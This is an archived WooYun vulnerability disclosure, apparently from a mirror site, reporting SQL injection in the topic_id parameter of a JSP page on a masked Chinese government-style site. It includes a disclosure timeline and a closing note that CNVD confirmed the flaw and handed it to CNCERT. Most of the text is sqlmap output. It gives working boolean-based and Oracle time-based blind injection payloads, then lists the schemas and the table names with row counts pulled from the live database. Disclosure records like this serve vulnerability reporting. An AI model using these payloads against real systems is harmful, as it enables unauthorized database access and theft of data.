乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-02: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
rt
http://**.**.**.**/message/messageManager/notion_list.jsp?topic_id=144470785089234606130176714333
sqlmap resumed the following injection point(s) from stored session:---Parameter: topic_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: topic_id=144470785089234606130176714333' AND 3171=3171 AND 'xNqs'='xNqs Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: topic_id=144470785089234606130176714333' AND 2376=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(121)||CHR(83)||CHR(97),5) AND 'kvBb'='kvBb---[17:57:36] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[17:57:36] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpartto database names on other DBMSes[17:57:36] [INFO] fetching database (schema) names[17:57:36] [INFO] fetching number of databases[17:57:37] [INFO] resumed: 16[17:57:37] [INFO] resumed: CTXSYS[17:57:37] [INFO] resumed: DBSNMP[17:57:37] [INFO] resumed: DMSYS[17:57:37] [INFO] resumed: EXFSYS[17:57:37] [INFO] resumed: HISIWEB300[17:57:37] [INFO] resumed: MDSYS[17:57:37] [INFO] resumed: OLAPSYS[17:57:37] [INFO] resumed: ORDSYS[17:57:37] [INFO] resumed: OUTLN[17:57:37] [INFO] resumed: SCOTT[17:57:37] [INFO] resumed: SYS[17:57:37] [INFO] resumed: SYSMAN[17:57:37] [INFO] resumed: SYSTEM[17:57:37] [INFO] resumed: TSMSYS[17:57:37] [INFO] resumed: WMSYS[17:57:37] [INFO] resumed: XDBavailable databases [16]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HISIWEB300[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
Database: HISIWEB300+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| WBPP_CONTENT_RELATION | 21817 || WBPP_CONTENT | 19992 || WBPP_CONTENT_RELATION_ZFENG | 19585 || WBPP_CONTENT_ZFENG0421 | 18270 || WBPP_CONTENT_JIU | 10556 || WBPP_CONTENT_OPTIONS | 6955 || TABLE1 | 6504 || TABLE59 | 6504 || S_USER_LOG | 6460 || WBPP_REPLY | 5353 || WBPP_CONTENT_OPTIONS_ZFENG0421 | 5207 || WBPP_RC_REFER | 3264 || TABLE67 | 2920 || DB_NOTION | 2447 || TABLE6 | 1896 || TABLE66 | 1896 || TABLE57 | 1197 || TABLE60 | 1141 || TABLE2 | 1047 || TABLE65 | 708 || TABLE9 | 708 || TABLE11 | 610 || TABLE61 | 608 || TABLE54 | 544 || TABLE58 | 534 || TABLE7 | 534 || TABLE12 | 533 || WBPP_TEMPLET | 463 || WBPP_C_TEMPLET | 397 || WBPP_COLUMN | 366 || WBPP_INFOPUB_OPTIONS | 366 || S_GROUP_FUNC | 303 || TABLE62 | 266 || TABLE13 | 238 || WBPP_AUDIT | 181 || DB_FIELD | 140 || TABLE64 | 134 || TABLE8 | 134 || KEY_INFO | 94 || S_USER_GROUP_MANAGER | 63 || S_USER | 62 || DB_TRANS_NODE | 55 || WBPP_RESOURCE | 55 || S_SECTION | 51 || WBPP_R_TEMPLET | 49 || TABLE4 | 38 || S_GROUP | 35 || DB_LOG_TRANS | 32 || TABLE5 | 29 || TABLE63 | 29 || WBPP_ACLASS | 29 || DB_LOG_TABLE | 27 || S_ORGANIZATION | 16 || DB_TABLE | 14 || WBPP_REPORTCITY_NM | 12 || DB_BASE_CLS | 10 || DB_TOPIC | 8 || DB_TRANS | 7 || WBPP_CONTENT_WJ | 5 || WBPP_BCLASS | 2 || DB_TABLE_TYPE | 1 || TABLE3 | 1 || WBPP_CCLASS | 1 || WBPP_WEBSITE | 1 |+--------------------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2016-01-08 16:09
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河北分中心,由河北分中心后续协调网站管理单位处置。
暂无
